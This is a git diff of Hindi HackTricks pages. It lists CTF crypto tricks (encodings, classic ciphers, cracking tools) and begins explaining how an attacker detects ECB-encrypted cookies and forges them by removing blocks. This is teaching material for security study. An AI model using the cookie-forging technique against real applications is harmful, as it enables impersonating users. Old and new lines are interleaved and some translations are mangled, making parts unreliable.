* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **हमें** **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* यदि आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)! * **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स** और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में **पीआर जमा करके**
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** पर **फॉलो** करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** को PRs जमा करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details> </details>
{% endhint %}

View file

@ -1,18 +1,19 @@
# क्रिप्टो सीटीएफएस ट्रिक्स # क्रिप्टो सीटीएफएस ट्रिक्स
{% hint style="success" %}
**AWS हैकिंग सीखें और प्रैक्टिस करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
**GCP हैकिंग सीखें और प्रैक्टिस करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) देखें! * **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में पीआर जमा करके।
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें** द्वारा PRs सबमिट करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details> </details>
{% endhint %}
## ऑनलाइन हैश डेटाबेस ## ऑनलाइन हैश डेटाबेस
@ -28,16 +29,16 @@ HackTricks का समर्थन करने के अन्य तरी
* [https://hashkiller.co.uk/Cracker/MD5](https://hashkiller.co.uk/Cracker/MD5) * [https://hashkiller.co.uk/Cracker/MD5](https://hashkiller.co.uk/Cracker/MD5)
* [https://www.md5online.org/md5-decrypt.html](https://www.md5online.org/md5-decrypt.html) * [https://www.md5online.org/md5-decrypt.html](https://www.md5online.org/md5-decrypt.html)
## जादू ऑटोसॉल्वर्स ## मैजिक ऑटोसॉल्वर्स
* [**https://github.com/Ciphey/Ciphey**](https://github.com/Ciphey/Ciphey) * [**https://github.com/Ciphey/Ciphey**](https://github.com/Ciphey/Ciphey)
* [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) (जादू मॉड्यूल) * [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) (मैजिक मॉड्यूल)
* [https://github.com/dhondta/python-codext](https://github.com/dhondta/python-codext) * [https://github.com/dhondta/python-codext](https://github.com/dhondta/python-codext)
* [https://www.boxentriq.com/code-breaking](https://www.boxentriq.com/code-breaking) * [https://www.boxentriq.com/code-breaking](https://www.boxentriq.com/code-breaking)
## एन्कोडर्स ## एन्कोडर्स
अधिकांश एन्कोडेड डेटा को इन 2 स्रोतों से डकोड किया जा सकता है: अधिकांश एन्कोडेड डेटा को इन 2 स्रोतों से डिकोड किया जा सकता है:
* [https://www.dcode.fr/tools-list](https://www.dcode.fr/tools-list) * [https://www.dcode.fr/tools-list](https://www.dcode.fr/tools-list)
* [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) * [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/)
@ -58,81 +59,34 @@ HackTricks का समर्थन करने के अन्य तरी
### बेस एन्कोडिंग्स ऑटोसॉल्वर ### बेस एन्कोडिंग्स ऑटोसॉल्वर
इन सभी बेस को चेक करें: [https://github.com/dhondta/python-codext](https://github.com/dhondta/python-codext) इन सभी बेस को चेक करें: [https://github.com/dhondta/python-codext](https://github.com/dhondta/python-codext)
* **हैज़15** \[_HNO4klm6ij9n+J2hyf0gzA8uvwDEq3X1Q7ZKeFrWcVTts/MRGYbdxSo=ILaUpPBC5_]
* **एस्की85**
* `BQ%]q@psCd@rH0l`
* **बेस26** \[_A-Z_]
* `BQEKGAHRJKHQMVZGKUXNT`
* **बेस32** \[_A-Z2-7=_]
* `NBXWYYLDMFZGCY3PNRQQ====`
* **Zबेस32** \[_ybndrfg8ejkmcpqxot1uwisza345h769_]
* `pbzsaamdcf3gna5xptoo====`
* **बेस32 जियोहैश** \[_0-9b-hjkmnp-z_]
* `e1rqssc3d5t62svgejhh====`
* **बेस32 क्रॉकफोर्ड** \[_0-9A-HJKMNP-TV-Z_]
* `D1QPRRB3C5S62RVFDHGG====`
* **बेस32 विस्तारित हेक्साडेसिमल** \[_0-9A-V_]
* `D1NMOOB3C5P62ORFDHGG====`
* **बेस45** \[_0-9A-Z $%\*+-./:_]
* `59DPVDGPCVKEUPCPVD`
* **बेस58 (बिटकॉइन)** \[_1-9A-HJ-NP-Za-km-z_]
* `2yJiRg5BF9gmsU6AC`
* **बेस58 (फ्लिकर)** \[_1-9a-km-zA-HJ-NP-Z_]
* `2YiHqF5bf9FLSt6ac`
* **बेस58 (रिप्पल)** \[_rpshnaf39wBUDNEGHJKLM4PQ-T7V-Z2b-eCg65jkm8oFqi1tuvAxyz_]
* `pyJ5RgnBE9gm17awU`
* **बेस62** \[_0-9A-Za-z_]
* `g2AextRZpBKRBzQ9`
* **बेस64** \[_A-Za-z0-9+/=_]
* `aG9sYWNhcmFjb2xh`
* **बेस67** \[_A-Za-z0-9-_.!\~\_]
* `NI9JKX0cSUdqhr!p`
* **बेस85 (एस्की85)** \[_!"#$%&'()\*+,-./0-9:;<=>?@A-Z\[\\]^\_\`a-u_]
* `BQ%]q@psCd@rH0l`
* **बेस85 (एडोबी)** \[_!"#$%&'()\*+,-./0-9:;<=>?@A-Z\[\\]^\_\`a-u_]
* `<~BQ%]q@psCd@rH0l~>`
* **बेस85 (IPv6 या RFC1924)** \[_0-9A-Za-z!#$%&()\*+-;<=>?@^_\`{|}\~\_]
* `Xm4y`V\_|Y(V{dF>\`
* **बेस85 (xbtoa)** \[_!"#$%&'()\*+,-./0-9:;<=>?@A-Z\[\\]^\_\`a-u_]
* `xbtoa Begin\nBQ%]q@psCd@rH0l\nxbtoa End N 12 c E 1a S 4e6 R 6991d`
* **बेस85 (XML)** \[_0-9A-Za-y!#$()\*+,-./:;=?@^\`{|}\~z\__]
* `Xm4y|V{~Y+V}dF?`
* **बेस91** \[_A-Za-z0-9!#$%&()\*+,./:;<=>?@\[]^\_\`{|}\~"_]
* `frDg[*jNN!7&BQM`
* **बेस100** \[]
* `👟👦👣👘👚👘👩👘👚👦👣👘`
* **बेस122** \[]
* `4F ˂r0Xmvc`
* **एटम-128** \[_/128GhIoPQROSTeUbADfgHijKLM+n0pFWXY456xyzB7=39VaqrstJklmNuZvwcdEC_]
* `MIc3KiXa+Ihz+lrXMIc3KbCC`
* **HAZZ15** \[_HNO4klm6ij9n+J2hyf0gzA8uvwDEq3X1Q7ZKeFrWcVTts/MRGYbdxSo=ILaUpPBC5_]
* `DmPsv8J7qrlKEoY7` * `DmPsv8J7qrlKEoY7`
* **MEGAN35** \[_3G-Ub=c-pW-Z/12+406-9Vaq-zA-F5_] * **मेगान35** \[_3G-Ub=c-pW-Z/12+406-9Vaq-zA-F5_]
* `kLD8iwKsigSalLJ5` * `kLD8iwKsigSalLJ5`
* **ZONG22** \[_ZKj9n+yf0wDVX1s/5YbdxSo=ILaUpPBCHg8uvNO4klm6iJGhQ7eFrWczAMEq3RTt2_] * **जॉंग22** \[_ZKj9n+yf0wDVX1s/5YbdxSo=ILaUpPBCHg8uvNO4klm6iJGhQ7eFrWczAMEq3RTt2_]
* `ayRiIo1gpO+uUc7g` * `ayRiIo1gpO+uUc7g`
* **ESAB46** \[] * **एसएबी46** \[]
* `3sHcL2NR8WrT7mhR` * `3sHcL2NR8WrT7mhR`
* **MEGAN45** \[] * **मेगान45** \[]
* `kLD8igSXm2KZlwrX` * `kLD8igSXm2KZlwrX`
* **TIGO3FX** \[] * **टिगो3एफएक्स** \[]
* `7AP9mIzdmltYmIP9mWXX` * `7AP9mIzdmltYmIP9mWXX`
* **TRIPO5** \[] * **त्रिपो5** \[]
* `UE9vSbnBW6psVzxB` * `UE9vSbnBW6psVzxB`
* **FERON74** \[] * **फेरोन74** \[]
* `PbGkNudxCzaKBm0x` * `PbGkNudxCzaKBm0x`
* **GILA7** \[] * **गिला7** \[]
* `D+nkv8C1qIKMErY1` * `D+nkv8C1qIKMErY1`
* **Citrix CTX1** \[] * **सिट्रिक्स सीटीएक्स1** \[]
* `MNGIKCAHMOGLKPAKMMGJKNAINPHKLOBLNNHILCBHNOHLLPBK` * `MNGIKCAHMOGLKPAKMMGJKNAINPHKLOBLNNHILCBHNOHLLPBK`
[http://k4.cba.pl/dw/crypo/tools/eng\_atom128c.html](http://k4.cba.pl/dw/crypo/tools/eng\_atom128c.html) - 404 डेड: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html) [http://k4.cba.pl/dw/crypo/tools/eng\_atom128c.html](http://k4.cba.pl/dw/crypo/tools/eng\_atom128c.html) - 404 Dead: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html)
### हैकराइज़ एक्सएस \[_╫Λ↻├☰┏_] ### हैकराइज़एक्स \[_╫Λ↻├☰┏_]
``` ```
╫☐↑Λ↻Λ┏Λ↻☐↑Λ ╫☐↑Λ↻Λ┏Λ↻☐↑Λ
``` ```
* [http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html) - 404 मरा हुआ: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html) * [http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html) - 404 मृत: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html)
### मोर्स ### मोर्स
``` ```
@ -176,7 +130,7 @@ ryvkryvkryvkryvkryvkryvkryvk
``` ```
* [http://www.webutils.pl/index.php?idx=binhex](http://www.webutils.pl/index.php?idx=binhex) * [http://www.webutils.pl/index.php?idx=binhex](http://www.webutils.pl/index.php?idx=binhex)
### ASCII85 ### एएससीआई85
``` ```
<~85DoF85DoF85DoF85DoF85DoF85DoF~> <~85DoF85DoF85DoF85DoF85DoF85DoF~>
``` ```
@ -196,14 +150,14 @@ drnajapajrna
``` ```
### अफाइन गुप्ताक्षर एन्कोड ### अफाइन गुप्ताक्षर एन्कोड
पत्र को संख्या में बदलें `(ax+b)%26` (_a_ और _b_ कुंजी हैं और _x_ पत्र है) और परिणाम को फिर से पत्र में बदलें अक्षर को संख्या में बदलें `(ax+b)%26` (_a_ और _b_ कुंजी हैं और _x_ अक्षर है) और परिणाम को फिर से अक्षर में बदलें
``` ```
krodfdudfrod krodfdudfrod
``` ```
### एसएमएस कोड ### एसएमएस कोड
**मल्टीटैप** [एक अक्षर को बदलता है](https://www.dcode.fr/word-letter-change) जिसे मोबाइल [फोन कीपैड](https://www.dcode.fr/phone-keypad-cipher) पर संबंधित कुंजी कोड द्वारा परिभाषित दोहरी अंकों से बदल दिया जाता है (यह मोड एसएमएस लिखते समय प्रयोग किया जाता है)।\ **मल्टीटैप** [एक अक्षर को बदलता है](https://www.dcode.fr/word-letter-change) जिसे मोबाइल [फोन कीपैड](https://www.dcode.fr/phone-keypad-cipher) पर संबंधित कुंजी कोड द्वारा पुनरावृत्त अंकों द्वारा परिभाषित किया जाता है (यह मोड एसएमएस लिखते समय प्रयोग किया जाता है)।\
उदाहरण: 2=A, 22=B, 222=C, 3=D...\ उदाहरण के लिए: 2=A, 22=B, 222=C, 3=D...\
आप इस कोड को पहचान सकते हैं क्योंकि आपको\*\* कई बार दोहराए गए अंक\*\* दिखाई देंगे। आप इस कोड को पहचान सकते हैं क्योंकि आपको\*\* कई बार दोहराए गए अंक\*\* दिखाई देंगे।
आप इस कोड को डीकोड कर सकते हैं: [https://www.dcode.fr/multitap-abc-cipher](https://www.dcode.fr/multitap-abc-cipher) आप इस कोड को डीकोड कर सकते हैं: [https://www.dcode.fr/multitap-abc-cipher](https://www.dcode.fr/multitap-abc-cipher)
@ -221,21 +175,21 @@ AABBB ABBAB ABABA AAAAA AAABA AAAAA BAAAA AAAAA AAABA ABBAB ABABA AAAAA
## संक्षेपण ## संक्षेपण
**Raw Deflate** और **Raw Inflate** (आप दोनों को साइबरचेफ में पा सकते हैं) डेटा को हेडर के बिना संक्षेपित और विस्तारित कर सकते हैं। **Raw Deflate** और **Raw Inflate** (आप दोनों को साइबरचेफ में पा सकते हैं) डेटा को हेडर के बिना संक्षेपित और विसंक्षेपित कर सकते हैं।
## सरल क्रिप्टो ## सरल एन्क्रिप्शन
### XOR - ऑटोसॉल्वर ### XOR - ऑटोसॉल्वर
* [https://wiremask.eu/tools/xor-cracker/](https://wiremask.eu/tools/xor-cracker/) * [https://wiremask.eu/tools/xor-cracker/](https://wiremask.eu/tools/xor-cracker/)
### Bifid ### बिफिड
एक कीवर्ड की आवश्यकता है एक कीवर्ड की आवश्यकता है
``` ```
fgaargaamnlunesuneoa fgaargaamnlunesuneoa
``` ```
### वजेनेर ### विजेनेर
एक कुंजीशब्द की आवश्यकता है एक कुंजीशब्द की आवश्यकता है
``` ```
@ -261,7 +215,7 @@ Key:
### समीर सीक्रेट शेयरिंग ### समीर सीक्रेट शेयरिंग
एक रहस्य को X भागों में विभाजित किया जाता है और इसे पुनर्प्राप्त करने के लिए आपको Y भागों की आवश्यकता होती है (_Y <=X_). एक रहस्य को एक्स भागों में विभाजित किया जाता है और इसे पुनर्प्राप्त करने के लिए आपको व्यक्तिगत भागों की आवश्यकता होती है (_व्यक्तिगत भागों की संख्या <= एक्स_).
``` ```
8019f8fa5879aa3e07858d08308dc1a8b45 8019f8fa5879aa3e07858d08308dc1a8b45
80223035713295bddf0b0bd1b10a5340b89 80223035713295bddf0b0bd1b10a5340b89
@ -269,27 +223,28 @@ Key:
``` ```
[http://christian.gen.co/secrets/](http://christian.gen.co/secrets/) [http://christian.gen.co/secrets/](http://christian.gen.co/secrets/)
### OpenSSL brute-force ### OpenSSL ब्रूट-फोर्स
* [https://github.com/glv2/bruteforce-salted-openssl](https://github.com/glv2/bruteforce-salted-openssl) * [https://github.com/glv2/bruteforce-salted-openssl](https://github.com/glv2/bruteforce-salted-openssl)
* [https://github.com/carlospolop/easy\_BFopensslCTF](https://github.com/carlospolop/easy\_BFopensslCTF) * [https://github.com/carlospolop/easy\_BFopensslCTF](https://github.com/carlospolop/easy\_BFopensslCTF)
## Tools ## उपकरण
* [https://github.com/Ganapati/RsaCtfTool](https://github.com/Ganapati/RsaCtfTool) * [https://github.com/Ganapati/RsaCtfTool](https://github.com/Ganapati/RsaCtfTool)
* [https://github.com/lockedbyte/cryptovenom](https://github.com/lockedbyte/cryptovenom) * [https://github.com/lockedbyte/cryptovenom](https://github.com/lockedbyte/cryptovenom)
* [https://github.com/nccgroup/featherduster](https://github.com/nccgroup/featherduster) * [https://github.com/nccgroup/featherduster](https://github.com/nccgroup/featherduster)
{% hint style="success" %}
AWS हैकिंग सीखें और प्रैक्टिस करें:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP हैकिंग सीखें और प्रैक्टिस करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
दूसरे तरीके HackTricks का समर्थन करने के लिए: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर हमें **फॉलो** करें।
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें** HackTricks और HackTricks Cloud github repos में PRs सबमिट करके।
</details> </details>
{% endhint %}

View file

@ -1,21 +1,22 @@
{% hint style="success" %}
**AWS हैकिंग सीखें और अभ्यास करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
**GCP हैकिंग सीखें और अभ्यास करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) देखें! * **हैकिंग ट्रिक्स साझा करें, पीआर जमा करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) **और** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **github रेपो में।**
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके।
</details> </details>
{% endhint %}
# ECB # ECB
(ECB) इलेक्ट्रॉनिक कोड बुक - सममित्र एन्क्रिप्शन योजना जो **प्रत्येक ब्लॉक को साफ पाठ के ब्लॉक से बदल देती है**। यह **सरलतम** एन्क्रिप्शन योजना है। मुख्य विचार यह है कि स्पष्ट पाठ को **N बिट के ब्लॉक में विभाजित** किया जाता है (इनपुट डेटा, एन्क्रिप्शन एल्गोरिदम के ब्लॉक का आकार पर निर्भर करता है) और फिर केवल एक ही कुंजी का उपयोग करके प्रत्येक स्पष्ट पाठ के ब्लॉक को एन्क्रिप्ट (डिक्रिप्ट) करना है। (ECB) इलेक्ट्रॉनिक कोड बुक - सममित्र एन्क्रिप्शन योजना जो **प्रत्येक साफ टेक्स्ट के ब्लॉक को** **साइपरटेक्स्ट के ब्लॉक से** **बदल देती है**। यह **सरलतम** एन्क्रिप्शन योजना है। मुख्य विचार यह है कि साफ टेक्स्ट को **N बिट के ब्लॉक में विभाजित** किया जाता है (इनपुट डेटा, एन्क्रिप्शन एल्गोरिदम के ब्लॉक का आकार पर निर्भर करता है) और फिर केवल कुंजी का उपयोग करके प्रत्येक साफ टेक्स्ट के ब्लॉक को एन्क्रिप्ट (डिक्रिप्ट) करना है।
![](https://upload.wikimedia.org/wikipedia/commons/thumb/e/e6/ECB_decryption.svg/601px-ECB_decryption.svg.png) ![](https://upload.wikimedia.org/wikipedia/commons/thumb/e/e6/ECB_decryption.svg/601px-ECB_decryption.svg.png)
@ -26,19 +27,19 @@ ECB का उपयोग करने के कई सुरक्षा प
# सुरक्षा दोष का पता लगाना # सुरक्षा दोष का पता लगाना
कल्पना करें कि आप कई बार एक एप्लिकेशन में लॉगिन करते हैं और आप **हमेशा एक ही कुकी** प्राप्त करते हैं। यह इसलिए है क्योंकि एप्लिकेशन की कुकी **`<उपयोगकर्ता नाम>|<पासवर्ड>`** है।\ कल्पना करें आप किसी एप्लिकेशन में लॉगिन करते हैं और आप **हमेशा एक ही कुकी** प्राप्त करते हैं। यह इसलिए है क्योंकि एप्लिकेशन की कुकी **`<उपयोगकर्ता नाम>|<पासवर्ड>`** है।\
फिर, आप नए उपयोगकर्ताओं को उत्पन्न करते हैं, जिनमें दोनों का **लंबा पासवर्ड** है और **लगभग** **एक ही** **उपयोगकर्ता नाम** है।\ फिर, आप नए उपयोगकर्ताओं को उत्पन्न करते हैं, जिनमें से दोनों का **लंबा पासवर्ड** है और **लगभग** **एक ही** **उपयोगकर्ता नाम** है।\
आप पता लगाते हैं कि **8B के ब्लॉक** जहां **दोनों उपयोगकर्ताओं की जानकारी** समान है, **बराबर** हैं। तब, आपको लगता है कि यह हो सकता है क्योंकि **ECB का उपयोग हो रहा है** आप पता लगाते हैं कि **8B के ब्लॉक** जहां **दोनों उपयोगकर्ताओं की जानकारी** समान हैं, **वे बराबर हैं**। तो, आपको लगता है कि यह हो सकता है क्योंकि **ECB का उपयोग हो रहा है**
जैसे निम्नलिखित उदाहरण में। ध्यान दें कि इन **2 डिकोड कुकी** में कई बार ब्लॉक **`\x23U\xE45K\xCB\x21\xC8`** है जैसे निम्नलिखित उदाहरण में। ध्यान दें कि इन **2 डिकोड कुकी** में कई बार ब्लॉक **`\x23U\xE45K\xCB\x21\xC8`** है।
``` ```
\x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8\x04\xB6\xE1H\xD1\x1E \xB6\x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8+=\xD4F\xF7\x99\xD9\xA9 \x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8\x04\xB6\xE1H\xD1\x1E \xB6\x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8+=\xD4F\xF7\x99\xD9\xA9
\x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8\x04\xB6\xE1H\xD1\x1E \xB6\x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8+=\xD4F\xF7\x99\xD9\xA9 \x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8\x04\xB6\xE1H\xD1\x1E \xB6\x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8+=\xD4F\xF7\x99\xD9\xA9
``` ```
यह इसलिए है क्योंकि **कुकीज़ के उस उपयोक्ता नाम और पासवर्ड में कई बार अक्षर "a" शामिल थे** (उदाहरण के लिए)। वे **ब्लॉक** जो **विभिन्न** हैं, वे उन ब्लॉक्स हैं जिनमें **कम से कम 1 विभिन्न वर्ण था** (शायद विभाजक "|" या उपयोक्ता नाम में कोई आवश्यक भिन्नता)। यह इसलिए है क्योंकि **कुकीज़ के उस उपयोक्ता नाम और पासवर्ड में कई बार अक्षर "a" शामिल थे** (उदाहरण के लिए)। **विभिन्न ब्लॉक** वे ब्लॉक हैं जिनमें **कम से कम 1 विभिन्न वर्ण था** (शायद विभाजक "|" या उपयोक्ता नाम में आवश्यक भिन्नता)।
अब, हमलावर को बस यह पता लगाना है कि प्रारूप `<उपयोक्ता नाम><विभाजक><पासवर्ड>` है या `<पासवर्ड><विभाजक><उपयोक्ता नाम>` है। इसके लिए, वह **कई उपयोक्ता नाम** उत्पन्न कर सकता है **जिनमें समान और लंबे उपयोक्ता नाम और पासवर्ड हों** जब तक वह प्रारूप और विभाजक की लंबाई को न पाए: अब, हमलावर को बस यह पता लगाना है कि प्रारूप `<उपयोक्ता नाम><विभाजक><पासवर्ड>` है या `<पासवर्ड><विभाजक><उपयोक्ता नाम>` है। इसके लिए, वह बस **कई उपयोक्ता नाम उत्पन्न कर सकता है** जिनमें **समान और लंबे उपयोक्ता नाम और पासवर्ड हों** जब तक वह प्रारूप और विभाजक की लंबाई को न पाए:
| उपयोक्ता नाम की लंबाई: | पासवर्ड की लंबाई: | उपयोक्ता नाम + पासवर्ड की लंबाई: | कुकी की लंबाई (डिकोडिंग के बाद): | | उपयोक्ता नाम की लंबाई: | पासवर्ड की लंबाई: | उपयोक्ता नाम + पासवर्ड की लंबाई: | कुकी की लंबाई (डिकोडिंग के बाद): |
| ---------------- | ---------------- | ------------------------- | --------------------------------- | | ---------------- | ---------------- | ------------------------- | --------------------------------- |
@ -48,7 +49,7 @@ ECB का उपयोग करने के कई सुरक्षा प
| 4 | 4 | 8 | 16 | | 4 | 4 | 8 | 16 |
| 7 | 7 | 14 | 16 | | 7 | 7 | 14 | 16 |
# सुरक्षा दोष का शोधन # सुरक्षा कमजोरी का शोषण
## पूरे ब्लॉक हटाना ## पूरे ब्लॉक हटाना
@ -56,24 +57,24 @@ ECB का उपयोग करने के कई सुरक्षा प
``` ```
\x23U\xE45K\xCB\x21\xC8\xE0Vd8oE\x123\aO\x43T\x32\xD5U\xD4 \x23U\xE45K\xCB\x21\xC8\xE0Vd8oE\x123\aO\x43T\x32\xD5U\xD4
``` ```
